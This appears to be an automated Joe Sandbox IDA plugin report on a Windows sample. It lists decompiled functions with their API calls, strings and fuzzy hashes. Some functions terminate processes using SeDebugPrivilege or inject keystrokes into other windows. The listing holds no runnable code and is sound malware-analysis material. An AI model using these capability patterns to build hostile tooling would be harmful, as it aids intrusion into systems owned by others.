Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: 54bd1c9efa356fcda0b2747d98b839f33c1c9a09b94fef27d72a9cc067b784a6
Instruction ID: 8b755bdbcec061564e8efee11223daf1e753a3d34ed43b609eafa24c48d2b583
Opcode Fuzzy Hash: 54bd1c9efa356fcda0b2747d98b839f33c1c9a09b94fef27d72a9cc067b784a6
Instruction Fuzzy Hash: 20E1A6316043019FCB24EF24C891B6ABBE1EF85364F14856DF8959B2E2DB31EC45EB52

Function 00EF4CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00EF466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00EF3697,?), ref: 00EF468B

Part of subcall function 00EF466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00EF3697,?), ref: 00EF46A4

Part of subcall function 00EF4A31: GetFileAttributesW.KERNEL32(?,00EF370B), ref: 00EF4A32

lstrcmpiW.KERNEL32(?,?), ref: 00EF4D40
_wcscmp.LIBCMT ref: 00EF4D5A
MoveFileW.KERNEL32(?,?), ref: 00EF4D75

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: ddba5d5226d7d12f967a16003a2640326a487737e81f27f69b66a32ff3f64344
Instruction ID: e8e9db4b6fd9db56758d1235592aa2db0c9947a3d57aa75fba69be2e9122e5aa
Opcode Fuzzy Hash: ddba5d5226d7d12f967a16003a2640326a487737e81f27f69b66a32ff3f64344
Instruction Fuzzy Hash: 2D5165F21083499BC725DB64D8819EF73ECAF85354F00192EF689E3191EF35A688C766

Function 00F18645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00F186FF

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 07b0bfa1bd8f2cfd3b4b6dea5d6cab4ab40fa0e251daae6a1a10e5a77fc9cc71
Instruction ID: 6162e44244676c5f5898cd88c86c0481a3ad1460f36adf51c9a45918981a2eda
Opcode Fuzzy Hash: 07b0bfa1bd8f2cfd3b4b6dea5d6cab4ab40fa0e251daae6a1a10e5a77fc9cc71
Instruction Fuzzy Hash: 41518F31900248BEEF209B24DE85FE97BA5AB057B0F704215FA11E61E1DB75ADC2FB50

Function 00E92B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00ECC2F7
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00ECC319
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00ECC331
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00ECC34F
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00ECC370
DestroyIcon.USER32(00000000), ref: 00ECC37F
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00ECC39C
DestroyIcon.USER32(?), ref: 00ECC3AB

Part of subcall function 00F1A4AF: DeleteObject.GDI32(00000000), ref: 00F1A4E8

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: 828a85fbd83a2d3448ddcd9bc49aa6a6732ac4794d124a074615769e0d6c7563
Instruction ID: c9ca83bae2c4a0e98375aab3b7c1a8cd2e3597308ea1620bf7b5a1a22d418556
Opcode Fuzzy Hash: 828a85fbd83a2d3448ddcd9bc49aa6a6732ac4794d124a074615769e0d6c7563
Instruction Fuzzy Hash: 36518A70600309AFDF24DF28DC45FAA7BE5EB08715F20552CFA06A72A0E771AC91EB50

Function 00EE966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00EEA82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00EEA84C
Part of subcall function 00EEA82C: GetCurrentThreadId.KERNEL32 ref: 00EEA853
Part of subcall function 00EEA82C: AttachThreadInput.USER32(00000000,?,00EE9683,?,00000001), ref: 00EEA85A

MapVirtualKeyW.USER32(00000025,00000000), ref: 00EE968E
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00EE96AB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00EE96AE
MapVirtualKeyW.USER32(00000025,00000000), ref: 00EE96B7
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00EE96D5
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00EE96D8
MapVirtualKeyW.USER32(00000025,00000000), ref: 00EE96E1
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00EE96F8
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00EE96FB

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 189e795d3852738afbb8ac84d9bade41e864e875049641d5e23f6f50e06c0c01
Instruction ID: 5961f79a03fb50f06d9acb0a0d434c717aa760f9218edc42ff9c06720fa4fe9a
Opcode Fuzzy Hash: 189e795d3852738afbb8ac84d9bade41e864e875049641d5e23f6f50e06c0c01
Instruction Fuzzy Hash: BE11E57191061CBEF6106F71DC49FAA3F5DEB4C750F115425F244AB1A1C9F25C10EAA4

Function 00EE8921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00EE853C,00000B00,?,?), ref: 00EE892A
HeapAlloc.KERNEL32(00000000,?,00EE853C,00000B00,?,?), ref: 00EE8931
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00EE853C,00000B00,?,?), ref: 00EE8946
GetCurrentProcess.KERNEL32(?,00000000,?,00EE853C,00000B00,?,?), ref: 00EE894E
DuplicateHandle.KERNEL32(00000000,?,00EE853C,00000B00,?,?), ref: 00EE8951
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00EE853C,00000B00,?,?), ref: 00EE8961
GetCurrentProcess.KERNEL32(00EE853C,00000000,?,00EE853C,00000B00,?,?), ref: 00EE8969
DuplicateHandle.KERNEL32(00000000,?,00EE853C,00000B00,?,?), ref: 00EE896C
CreateThread.KERNEL32(00000000,00000000,00EE8992,00000000,00000000,00000000), ref: 00EE8986

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: a93c31050c51bc2724bfa5be9a4bd2c3d5cffd6d3ee251cf2f694b71777224ad
Instruction ID: 5a24c9071182e13b438b1b74f1bc896297c6b6d0561202dc77ba38c098f930ed
Opcode Fuzzy Hash: a93c31050c51bc2724bfa5be9a4bd2c3d5cffd6d3ee251cf2f694b71777224ad
Instruction Fuzzy Hash: 5E01BFB5640348FFE710ABA5DC4DFA73B6CEB89711F418421FA09DB191CA759804DB20

Function 00F09B23 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 00F09BA4, 00F09EC8
Not an Object type, xrefs: 00F09B7B

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: bad61ee533e79d9558660d536e2748335b0acd987e94bf0bf2f1384e943527e9
Instruction ID: f47b92bd6d14707babb950ac51149b06c1839454adde3794170f925d20bfa493
Opcode Fuzzy Hash: bad61ee533e79d9558660d536e2748335b0acd987e94bf0bf2f1384e943527e9
Instruction Fuzzy Hash: 44C19371E0421A9BDF10DF98D884BAEB7F5FB48314F148469E905A72C2E7B0AD45EB60

Function 00F09113 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F09167
VariantInit.OLEAUT32(?), ref: 00F09238
VariantInit.OLEAUT32(?), ref: 00F09339
VariantClear.OLEAUT32(?), ref: 00F09343
VariantClear.OLEAUT32(?), ref: 00F093A0

Strings

Incorrect Object type in FOR..IN loop, xrefs: 00F0931C
Null Object assignment in FOR..IN loop, xrefs: 00F091C8, 00F092F6, 00F093AE

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-625585964
Opcode ID: d769186adb75f69f025e974aa1355e726ea384dc64d1052c8f4629c6d60a50ad
Instruction ID: 0ab0e906eacc1b09995bb2d5b3a31cc2242ecea080795f1d5993d9a6d1fb688a
Opcode Fuzzy Hash: d769186adb75f69f025e974aa1355e726ea384dc64d1052c8f4629c6d60a50ad
Instruction Fuzzy Hash: 8E917F71E04219ABDF24DFA5CC48FAEB7B8EF45720F108119E515AB2C1E7B09905EFA0

Function 00F0975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 00EE710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EE7044,80070057,?,?,?,00EE7455), ref: 00EE7127
Part of subcall function 00EE710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EE7044,80070057,?,?), ref: 00EE7142
Part of subcall function 00EE710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EE7044,80070057,?,?), ref: 00EE7150
Part of subcall function 00EE710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EE7044,80070057,?), ref: 00EE7160

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00F09806
_memset.LIBCMT ref: 00F09813
_memset.LIBCMT ref: 00F09956
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00F09982
CoTaskMemFree.OLE32(?), ref: 00F0998D

Strings

NULL Pointer assignment, xrefs: 00F099DB

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: c239f2440ac18b7fc97a500368e8315fc3377cab49aca302d55c2f6b3fa6c7aa
Instruction ID: df9c0341663f79c42dcb4b831a0ecca51c6c6af1800facfa68bbea40d00f33e3
Opcode Fuzzy Hash: c239f2440ac18b7fc97a500368e8315fc3377cab49aca302d55c2f6b3fa6c7aa
Instruction Fuzzy Hash: 08913671D04229ABDF10DFA5DC80EDEBBB9AF48320F10415AF519B7291EB719A44DFA0

Function 00F16D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00F16E24
SendMessageW.USER32(?,00001036,00000000,?), ref: 00F16E38
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00F16E52
_wcscat.LIBCMT ref: 00F16EAD
SendMessageW.USER32(?,00001057,00000000,?), ref: 00F16EC4
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00F16EF2

Strings

SysListView32, xrefs: 00F16DF6

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: 10a103c3a9b7446ffec21584a9e4c6b8b8633a3c61425260e73191f5ec2d3f1c
Instruction ID: cb99060c35c897ccad6be761b7847b48d986d280ecc28e1164c4558383f6d639
Opcode Fuzzy Hash: 10a103c3a9b7446ffec21584a9e4c6b8b8633a3c61425260e73191f5ec2d3f1c
Instruction Fuzzy Hash: 5341B271A00348AFDB21DF64DC85BEE77E8EF08360F10452AF984E7291D6719DC4AB64

Function 00F0E933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 00EF3C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00EF3C7A
Part of subcall function 00EF3C55: Process32FirstW.KERNEL32(00000000,?), ref: 00EF3C88
Part of subcall function 00EF3C55: CloseHandle.KERNEL32(00000000), ref: 00EF3D52

OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F0E9A4
GetLastError.KERNEL32 ref: 00F0E9B7
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F0E9E6
TerminateProcess.KERNEL32(00000000,00000000), ref: 00F0EA63
GetLastError.KERNEL32(00000000), ref: 00F0EA6E
CloseHandle.KERNEL32(00000000), ref: 00F0EAA3

Strings

SeDebugPrivilege, xrefs: 00F0E9C2

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 4f07cf2c5c0892878d3e8315c53681c8f01b4c2e1d695525a9dec3a15a2800ea
Instruction ID: 8aad9619f1a3b7adb64370240bc5125b90eb144229c78c65ca49454d9028f3a0
Opcode Fuzzy Hash: 4f07cf2c5c0892878d3e8315c53681c8f01b4c2e1d695525a9dec3a15a2800ea
Instruction Fuzzy Hash: AA419C317002049FDB25EF68CC95FAEB7E5AF45310F14881CF906AB2D2DB74A808EB91

Function 00EF2F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 00EF3033

Strings

info, xrefs: 00EF2FD4
stop, xrefs: 00EF3004
question, xrefs: 00EF2FEC
warning, xrefs: 00EF301C
blank, xrefs: 00EF2FB5

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 2a8306cdb17f1a3e02e86701b964dc7247f928aeb9edc5d50911c1660e107707
Instruction ID: d7ea2debf9c7e310582afd0f7fabc8539e6cc2f31cbc38ced531cacdfacce131
Opcode Fuzzy Hash: 2a8306cdb17f1a3e02e86701b964dc7247f928aeb9edc5d50911c1660e107707
Instruction Fuzzy Hash: AA11D53234838ABEE7159A65DC42CFF7B9C9F15364B20102FFB04B6282DF619F4166A5

Function 00EF42F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00EF4312
LoadStringW.USER32(00000000), ref: 00EF4319
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00EF432F
LoadStringW.USER32(00000000), ref: 00EF4336
_wprintf.LIBCMT ref: 00EF435C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00EF437A

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00EF4357

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: e5d1144d9ab92459825604faea7f23da167f5dfb07f62e41e494c9c54e475561
Instruction ID: ed698e906f9255ae33953d9383bd93be5a1105e69c5218977b66b94234ef18d2
Opcode Fuzzy Hash: e5d1144d9ab92459825604faea7f23da167f5dfb07f62e41e494c9c54e475561
Instruction Fuzzy Hash: 4B014BF690020CBFE711EBA0DD89EFB776CEB08300F4045A1BB49E2051EA759E895B71

Function 00F1D43E Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E92612: GetWindowLongW.USER32(?,000000EB), ref: 00E92623

GetSystemMetrics.USER32(0000000F), ref: 00F1D47C
GetSystemMetrics.USER32(0000000F), ref: 00F1D49C
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00F1D6D7
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00F1D6F5
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00F1D716
ShowWindow.USER32(00000003,00000000), ref: 00F1D735
InvalidateRect.USER32(?,00000000,00000001), ref: 00F1D75A
DefDlgProcW.USER32(?,00000005,?,?), ref: 00F1D77D

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: fa2828b172d749732ee5821065e584f3fae5de6eea35f94a5043c8e45f11ca02
Instruction ID: c6fd64e0bdcbc47f9611bc2edf74d0775b3691e826956f5f2c5a42b33fa39d2b
Opcode Fuzzy Hash: fa2828b172d749732ee5821065e584f3fae5de6eea35f94a5043c8e45f11ca02
Instruction Fuzzy Hash: 07B19A71A00229EFDF14CF69C9C57ED7BB1BF04711F098069EC489B295D734A990EB90

Function 00E92A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00ECC1C7,00000004,00000000,00000000,00000000), ref: 00E92ACF
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00ECC1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00E92B17
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00ECC1C7,00000004,00000000,00000000,00000000), ref: 00ECC21A
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00ECC1C7,00000004,00000000,00000000,00000000), ref: 00ECC286

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 6a3c756a1130533c9327de160a7f34f0bf0d20a9aaef7c7af4b9801b2d807664
Instruction ID: 78887da8e8a664b5edb4cc0f3f907b46eab2638483836aa2f39f3a732ecded81
Opcode Fuzzy Hash: 6a3c756a1130533c9327de160a7f34f0bf0d20a9aaef7c7af4b9801b2d807664
Instruction Fuzzy Hash: B9412232604B84BACF398B28DD8CFEB7BD1AB45314F24E41DE247B6571C6B19886E710

Function 00EF70C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 00EF70DD

Part of subcall function 00EB0DB6: std::exception::exception.LIBCMT ref: 00EB0DEC
Part of subcall function 00EB0DB6: __CxxThrowException@8.LIBCMT ref: 00EB0E01

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00EF7114
EnterCriticalSection.KERNEL32(?), ref: 00EF7130
_memmove.LIBCMT ref: 00EF717E
_memmove.LIBCMT ref: 00EF719B
